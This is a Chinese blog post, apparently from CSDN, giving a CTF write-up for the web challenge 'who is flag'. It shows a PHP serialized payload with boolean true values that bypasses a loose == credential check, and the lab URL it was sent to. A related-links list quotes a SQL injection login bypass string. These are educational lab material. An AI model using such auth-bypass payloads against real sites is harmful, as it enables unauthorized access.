ctf web who is flag

已于 2024-05-22 18:02:22 修改
阅读量236 收藏 1
点赞数 7
分类专栏: CTF 文章标签: web安全 网络安全
于 2024-04-22 21:41:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63554401/article/details/138093608
版权

flag{who_is_flag_3001}

打开网页如图所示,仔细检查上面的代码,发现是需要通过get info来获取username和password,而其正确的username和password暂未给你。

但是发现代码中对username和password的判断使用==,那么这意味着可以通过bool型来强行使网页判断为true;

发现data_unserialize = unserialize($info);这段代码使用了unserialize函数对输入的信息进行反序列化,那么我们先对像输入的内容进行序列化;

首先构建php文件:

具体内容如下所示:

<?php echo serialize(array( "username"=>true, "password"=>true, )); ?>

接下来再目录下输入cmd进入控制台,输入php test.php

输出序列化内容

a:2:{s:8:"username";b:1;s:8:"password";b:1;}

接下来访问172.17.0.34/?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}

(因为从代码中可以看出是对info进行GET)

找到了flag

flag为flag{who_is_flag_3001}

白鹿依海
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
ctf web解题找flag夺旗赛之常用的解题思路及技巧
12-29
ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺...
ctf web解题 找flag夺旗赛概述、原理及应用.pdf
05-13
CTF(Capture The Flag,夺旗赛)在网络安全领域中是一种流行的技术竞技比赛形式,尤其在Web安全领域。以下是关于CTF Web解题、找flag夺旗赛的概述、原理及应用: 概述: CTF Web解题是CTF比赛中的一种题型,主要...
ctf web who is flag(1)
2401_84969658的博客
05-16 397
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
ctf web3 30 flag就在这里快来找找吧http://123.206.87.240:8002/web3
MIGENGKING的博客
06-13 7400
这节我们来破解一个HTML密码。 打开题目有提示“flag就在这里”的页面,总是打不开页面: 这时我们可以按“Fn+F12”(或者按“ctrl+U”)直接查看页面源码: 这是我们就需要把页面的HYML源代码在线解码一下(是解码!!): 但我们提交flag时提交(KEY{J2sa42ahJK-HS11III}) 这里我们应该了解一些关于ctf常见代码: 1.Base32加密: 例:KRUG...
CTFWEB·通过CTFshow的例题来学习信息收集类题目的题型及对应做法
qq_54502707的博客
12-18 1989
大家好,这里是KOKO师傅~ WEB方向最简单的莫过于信息收集类型题目,我们以CTFshow的相关题目作为例题对这一类型的题目进行一个模块的针对练习!
WgpSec CTF-Web部分wp
m0_74606212的博客
09-18 300
WpgSec CTF-Web部分wp
Bugku-CTFweb3-flag就在这里快来找找吧
weixin_33896069的博客
04-19 1426
Day6 web3 30 flag就在这里快来找找吧http://123.206.87.240:8002/web3/ 本题要点:NCR 转义序列(Unicode) 在Windows中经常需要用到多字符与宽字符的转换方法,多字符(MultiChar)也就是ANSI编码的方式,而宽字符(WideChar)也就是Unicode编码的方式。 ANSI是默认的...
GrabCON CTF 2021 Web
LYJ20010728的博客
09-08 251
GrabCON CTF 2021 WebE4sy Pe4sy题目描述解题思路Door Lock题目描述解题思路Basic Calc题目描述解题思路Null Food Factory题目描述解题思路 E4sy Pe4sy 题目描述 Hack admin user! 解题思路 找到登录处尝试利用万能密码进行登录,发现密码处存在万能密码登录 admin:admin' or 1=1# 登录后即可拿到 FLAG Door Lock 题目描述 The door is open to all! Se
i春秋web-1
小白的劝退之路
10-16 974
MISC web 爆破-1 两个’/‘之间的符号是正则表达式,’^’ 表示匹配开始,‘$’匹配结束,‘\w‘表示匹配字母或数字或下划线或汉字,‘*’表示匹配前面的字符0次或多次,使用PHP中的 $GLOBALS变量即可 MISC web 爆破-2 不在变量中,就是在文件中,使用file()或者file_get_contents()或者‘);‘’ ...
CTF】buuctf web 详解(持续更新)
热门推荐
m0_52923241的博客
08-12 3万+
buuctf web[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[强网杯 2019]随便注[ACTF2020 新生赛]Include[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File[ACTF2020 新生赛]Exec[极客大挑战 2019]LoveSQL[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]Http[RoarCTF 2019]Easy
CTF-Web7(涉及盲注脚本)
→_→
08-21 1117
7.who are you? 进入这个页面,发现他获取了我的ip,首先想到的就是user agent注入,用updatexml试一下,什么错的没有报...看来这个思路不行(注:user agent注入和updatexml不会的参考Sqli-labs之Less-18和Less-19) 百度了才知道这是一道伪造IP的题,总结下,伪造IP的HTTP头都有这些: X-Forwarded-For Client-IP x-remote-IP x-originating-IP x-re...
ctf web解题 找flag夺旗赛
05-19
ctf web解题 找flag夺旗赛
ctf web解题 找flag夺旗赛.zip
05-19
ctf web解题 找flag夺旗赛
CTF Web解题大解密:如何找到神秘的Flag,成为夺旗赛的MVP
12-29
CTF,全称Capture The Flag,是一种网络安全竞赛,参赛者需在虚拟环境中...在CTF Web解题中,我们的目标是找到隐藏在网站中的Flag。这些Flag就像宝藏一样,藏在网站的各个角落,只有找到它们,我们才能获得比赛的胜利。
自学黑客技术(网络安全
dexi1113的博客
06-24 2479
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
Java中的网络安全与防护技巧
qq836869520的博客
06-23 365
大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!今天我们将深入探讨在Java应用程序中如何有效地保护网络安全,防范各种安全威胁。随着互联网应用的普及和发展,安全问题变得越来越重要,特别是在处理用户数据和敏感信息时,保障数据的安全性和完整性是每个开发者必须关注的重点之一。
AI+零信任 | 易安联亮相首届“矩阵杯”网络安全大赛
最新发布
Enlink_Young的博客
06-27 384
结合不同维度的上下文,从参与访问的实体对象(用户、设备、网络、应用、数据等)、访问会话所处的时间阶段(身份认证,会话建立、业务通信、会话关闭)、访问发生的空间位置(终端、数据中心、云端)等层面,通过融合现有的网络安全工具和技术能力,实施。展会现场,易安联携全套零信任安全产品体系以及面向运营商、教育、政府、大型企业等的ZTNA行业解决方案和SASE解决方案亮相,全面展示数字技术创新安全成果,凭借独特的行业视角和优秀的技术实力得到广泛关注,成为本次展会上的亮点之一。基于AI的零信任框架,可以帮助进行。
网络安全概论
m0_73687800的博客
06-26 426
笔者最近在复习选修的一门信息网络安全的课程,该课程上课PPT乃是纯英文,实在难以开读,转头求索,又无处可得。于是考前深夜阅读计算机网络的网络安全一章,希翼能有所收获。主动攻击:攻击者对某个连接中通过的PDU进行各种处理,共有三类:更改报文流,拒绝报文服务,伪造连接初始化。计算机网络面临四种威胁:截获,中断,篡改,伪造。这四类威胁又可分为两大类:被动攻击和主动攻击。被动攻击:仅观察分析PDU而不干扰。附加一类主动攻击:恶意程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白鹿依海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值